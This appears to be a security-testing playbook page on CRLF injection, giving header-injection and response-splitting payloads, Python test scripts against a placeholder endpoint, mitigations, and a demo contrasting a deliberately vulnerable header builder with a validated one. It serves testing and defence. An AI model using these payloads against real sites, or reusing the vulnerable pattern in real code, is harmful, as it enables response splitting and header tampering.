# CRLF Injection

#### Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

#### Example with Scenario

**Scenario:** A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

#### Payloads and Test Cases

**Payloads**

1. **Header Injection:**

   ```
   %0D%0AInjected-Header: injected
   ```
2. **HTTP Response Splitting:**

   ```
   %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>
   ```

**Test Cases**

1. **Header Injection:**
   * **Payload:**

     ```
     %0D%0AInjected-Header: injected
     ```
   * **Test Case:**

     ```python
     import requests  # assumption: the original's helper calls are implemented with requests

     TARGET = "https://target.example/page"  # placeholder for the endpoint under test

     # Send payload to the server; keep it pre-encoded so the CRLF survives transit
     resp = requests.get(TARGET + "?input=%0D%0AInjected-Header: injected")
     # Verify if the application includes the injected header in its response
     print("vulnerable" if resp.headers.get("Injected-Header") == "injected" else "not reflected")
     ```
2. **HTTP Response Splitting:**
   * **Payload:**

     ```
     %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>
     ```
   * **Test Case:**

     ```python
     import requests  # assumption: the original's helper calls are implemented with requests

     TARGET = "https://target.example/page"  # placeholder for the endpoint under test
     PAYLOAD = "%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>"

     # Send payload to the server; keep it pre-encoded so the CRLF survives transit
     resp = requests.get(TARGET + "?input=" + PAYLOAD)
     # Verify if the application splits the HTTP response (injected body reaches the client)
     print("vulnerable" if "<h1>Injected Content</h1>" in resp.text else "not split")
     ```

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain CRLF characters.
   * Implement strict validation rules to reject malicious input.
2. **Use Libraries:**
   * Use libraries and frameworks that automatically handle header encoding and prevent injection.
   * Avoid constructing HTTP headers manually using user input.
3. **Secure Headers:**
   * Set secure HTTP headers to mitigate the impact of potential CRLF injection.
   * Use Content Security Policy (CSP) and other security headers to protect the application.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing header information in error messages.
   * Return generic error messages without disclosing sensitive details.
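As an added example (not code from the original playbook), the manual header-concatenation pattern that mitigations 1 and 2 warn against sits next to a validated version, fed the page's header-injection payload. The redirect response, the `ref` parameter and the minimal header parser are constructed for this demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample: the page's header-injection payload as it arrives in a
# query parameter that the application echoes into a response header.
USER_INPUT = unquote("%0D%0AInjected-Header: injected")

CRLF = "\r\n"


def build_redirect_vulnerable(ref: str) -> str:
    """Raw response built by string concatenation; user input lands in a header unchecked."""
    return "HTTP/1.1 302 Found" + CRLF + "Location: /page?ref=" + ref + CRLF + CRLF


# RFC 9110 field-value characters: visible ASCII, space and horizontal tab.
# CR, LF, NUL and other control characters are rejected rather than stripped.
_FIELD_VALUE = re.compile(r"[\x20-\x7e\t]*")


def validate_header_value(value: str) -> str:
    """Return value unchanged if it is a legal header field value, else raise."""
    if _FIELD_VALUE.fullmatch(value) is None:
        raise ValueError("header value contains CR, LF or another control character")
    return value


def build_redirect_hardened(ref: str) -> str:
    """Same response, but the user-supplied value must pass validation first."""
    return "HTTP/1.1 302 Found" + CRLF + "Location: /page?ref=" + validate_header_value(ref) + CRLF + CRLF


def parse_headers(raw: str) -> dict:
    """Minimal parser: header block of a raw response as name -> value (first occurrence wins)."""
    head = raw.split(CRLF + CRLF, 1)[0]
    headers = {}
    for line in head.split(CRLF)[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip(), value.strip())
    return headers


def demo(user_input: str = USER_INPUT) -> tuple:
    """(injected header present in the vulnerable build, hardened build rejected the input)."""
    injected = "Injected-Header" in parse_headers(build_redirect_vulnerable(user_input))
    try:
        build_redirect_hardened(user_input)
        rejected = False
    except ValueError:
        rejected = True
    return injected, rejected


if __name__ == "__main__":
    print(demo())  # (True, True)
```

Rejecting (rather than silently stripping) the control characters keeps the failure visible in logs, which is what a detection rule for this class of input should key on.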

